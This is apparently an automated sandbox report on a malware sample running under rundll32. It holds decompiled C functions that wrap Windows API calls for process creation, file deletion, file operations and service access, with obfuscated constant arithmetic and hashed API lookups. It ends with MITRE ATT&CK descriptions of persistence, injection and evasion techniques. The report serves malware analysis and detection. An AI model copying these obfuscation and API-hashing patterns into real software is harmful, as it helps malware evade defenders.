0x00161026
0x0016102d
0x00161034
0x0016103b
0x00161047
0x0016104f
0x00161057
0x0016105e
0x00161065
0x0016106c
0x00161073
0x00161077
0x0016108b
0x00161096
0x0016109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00161096

Strings

[, xrefs: 0016103B

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: d00b69c5ec470ec9a57818b6da59f4d399cc1a82510ec533318c599be3cb1ae5
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: F5015BB6D01308FBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00164859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00164859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001707A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0016485e
0x0016487a
0x0016487d
0x00164884
0x0016488b
0x00164892
0x0016489d
0x001648a0
0x001648ad
0x001648b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001648B7

Strings

[, xrefs: 0016488B

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: b67a413e0cbf11a42e9217767bed07da42d3ce3789852c93d143137a19019e08
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 4BF017B0A05309FBDB08CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00174F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00174F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0016602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001707A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00174f80
0x00174f81
0x00174f82
0x00174f86
0x00174f87
0x00174f8c
0x00174fa5
0x00174fa8
0x00174faf
0x00174fb6
0x00174fc7
0x00174fca
0x00174fd7
0x00174fe2
0x00174fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00174FE2

Strings

{#lm, xrefs: 00174FC2

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: c39c0378e1236b0977f93f767edf38f9cdf2f1d9a71872e3bc76ea7e0d7d78a1
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: E5F037B081120CFFDB08DFA4D94289EBFBAEB44300F208199E808AB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 0017976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0017976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0016602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001707A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00179772
0x00179773
0x00179778
0x0017977a
0x0017977b
0x0017977e
0x0017977f
0x00179782
0x00179785
0x00179788
0x00179789
0x0017978c
0x0017978f
0x00179790
0x00179791
0x00179794
0x00179797
0x0017979a
0x0017979d
0x001797a0
0x001797a3
0x001797a6
0x001797a7
0x001797a8
0x001797ad
0x001797b7
0x001797c3
0x001797ca
0x001797d1
0x001797d8
0x001797df
0x001797e3
0x001797fc
0x00179816
0x0017981d

APIs

CreateProcessW.KERNEL32(0016591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0016591A), ref: 00179816

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: cb2bea038d959a87a84785623d092cd72ab99de8d7ddfb6504d914a82ebbb188
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 9C11B372901148FBDF1A9FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0016B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0016B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0016602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001707A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0016b569
0x0016b56a
0x0016b56d
0x0016b572
0x0016b574
0x0016b577
0x0016b57a
0x0016b57d
0x0016b580
0x0016b583
0x0016b586
0x0016b587
0x0016b58a
0x0016b58d
0x0016b590
0x0016b593
0x0016b594
0x0016b595
0x0016b59a
0x0016b5a4
0x0016b5b8
0x0016b5c0
0x0016b5c4
0x0016b5cb
0x0016b5d2
0x0016b5d9
0x0016b5e6
0x0016b5fd
0x0016b604

APIs

CreateFileW.KERNELBASE(00170668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00170668,?,?,?,?), ref: 0016B5FD

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: abb30696cdafe2cd247de16dc1d7f1385b776900eaaa0e47f0c3d6fa562544c0
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: F711BF72801248BBDF16DF95DD06CEE7FBAEF89314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0017981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0017981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0016602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001707A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00179821
0x00179822
0x00179825
0x00179828
0x0017982a
0x0017982c
0x0017982f
0x00179832
0x00179835
0x00179836
0x00179837
0x0017983c
0x00179855
0x00179858
0x0017985f
0x00179866
0x0017986d
0x00179874
0x0017987b
0x0017988e
0x0017989b
0x001798a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001687F2,0000CAAE,0000510C,AD82F196), ref: 0017989B

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: cfcabf17a41109b3154df2488a3f8f76d7fd95f7c71e10077502a0e334fa11f1
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 16019A72801208FBDB08EFD5DC46CDFBF79EF85310F108198F908A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00177BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00177BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0016602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001707A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00177bf7
0x00177bf8
0x00177bfa
0x00177bfd
0x00177bff
0x00177c02
0x00177c06
0x00177c07
0x00177c0f
0x00177c1d
0x00177c25
0x00177c2d
0x00177c31
0x00177c38
0x00177c3f
0x00177c46
0x00177c4a
0x00177c5e
0x00177c67
0x00177c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00177C67

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 502e0092cb2bfd4e7570981520ab22d97051d15291e943232b33facacaf96d2d
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: BC012CB1901208FFEB09DF94C84A8DE7BB9EB54314F108198F40567240E7B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 0016F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0016F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0016602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001707A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0016f662
0x0016f663
0x0016f665
0x0016f668
0x0016f66a
0x0016f66d
0x0016f670
0x0016f673
0x0016f677
0x0016f678
0x0016f67d
0x0016f687
0x0016f693
0x0016f69a
0x0016f6a1
0x0016f6a5
0x0016f6a9
0x0016f6b0
0x0016f6c9
0x0016f6d8
0x0016f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0016F6D8

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 6b8b9312792df273cc49a280ec010d9139d162cdb75f9f998b69367396350815
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 7C01E5B6901208BBEF059F94DC068DF7F79EB15324F148188F90462250D7B25F61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0016B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0016B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0016602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001707A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0016b6f3
0x0016b6f8
0x0016b702
0x0016b70b
0x0016b712
0x0016b719
0x0016b720
0x0016b727
0x0016b72e
0x0016b747
0x0016b759
0x0016b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0016B759

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: db0147719d31210eda708251b8e717a061c5749ce410bd1aa90c1c4292e3c46b
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 410128B6941308FBEB45DF94DD06A9E7BB5EB18704F108188FA09661A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0017AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0016602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001707A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0017aa3f
0x0017aa40
0x0017aa41
0x0017aa44
0x0017aa47
0x0017aa4b
0x0017aa4c
0x0017aa51
0x0017aa5b
0x0017aa64
0x0017aa68
0x0017aa6f
0x0017aa76
0x0017aa8d
0x0017aa90
0x0017aa9d
0x0017aaa8
0x0017aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0017AAA8

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 5c6df9e62ea30c9dfd058676d43c4f15570e72dd1e47bf585a08c436a5d036b2
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 32F019B590020CFFDF08DF94DD4A99EBFB9EB45304F108198F915A6250D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00165FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00165FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0016602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001707A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00165fb5
0x00165fb6
0x00165fb7
0x00165fbb
0x00165fbc
0x00165fc1
0x00165fcb
0x00165fd7
0x00165fde
0x00165fe5
0x00165ffc
0x00165fff
0x00166006
0x0016600d
0x0016601a
0x00166025
0x0016602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00166025

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 81425e241a00331b2a2be5ce1643260dfa4f5171d299ac3a7076c8c9c4881124
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: CDF03CB0811208FFDB08DFA4E94689EBFB8EB50300F208198E409A7260E7715F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
